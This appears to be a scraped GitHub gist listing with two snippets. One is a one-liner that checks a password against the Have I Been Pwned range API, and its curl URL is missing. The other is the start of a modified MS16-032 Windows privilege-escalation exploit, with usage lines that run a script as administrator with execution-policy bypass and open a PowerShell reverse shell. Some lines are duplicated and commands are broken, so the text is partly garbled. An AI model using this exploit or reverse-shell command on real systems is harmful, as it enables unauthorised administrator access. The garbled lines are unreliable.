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thalex / leakcheck_kanonymity.txt
Created April 24, 2018 14:22 — forked from intrd/leakcheck_kanonymity.txt
One-liner password leak check + k-anonymity method (w/out exposing the password on request)
## One-liner password leak check + k-anonymity method (w/out exposing the password on request)
# Compute the SHA1, Grab 1st 5 chars of the hash, check by range on huge haveibeenpwnd DB!
# original source:
VARPWD='test123'; HASH=`echo -n $VARPWD | sha1sum`; curl --silent`cut -b 1-5 <(echo $HASH)` --stderr - | grep -i `cut -b 6- <(echo $HASH) | cut -d ' ' -f 1`
thalex / ms16_032_intrd_mod.ps1
Created June 24, 2017 15:32 — forked from intrd/ms16_032_intrd_mod.ps1
MS16-032 priv escalation exploit modded - interactive shell & command argv
## intrd's MS16-032 priv escalation exploit modded - interactive shell & command argv
# exploit MS16-032 and run shell.ps1(ATTACHMNT) as administrator: Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command Import-Module C:\Users\IEUser\Desktop\shell.ps1;Start-Sleep -s 10"
# reverse shell as current user: Invoke-PowerShellTcp -Reverse -IPAddress -Port 4567
function Invoke-MS16-032 {
PowerShell implementation of MS16-032. The exploit targets all vulnerable
function Invoke-MS16-032 {
PowerShell implementation of MS16-032. The exploit targets all vulnerable
operating systems that support PowerShell v2+. Credit for the discovery of
the bug and the logic to exploit it go to James Forshaw (@tiraniddo) and @Fuzzysec for the original PS script.
Modifications by Mike Benich (@benichmt1).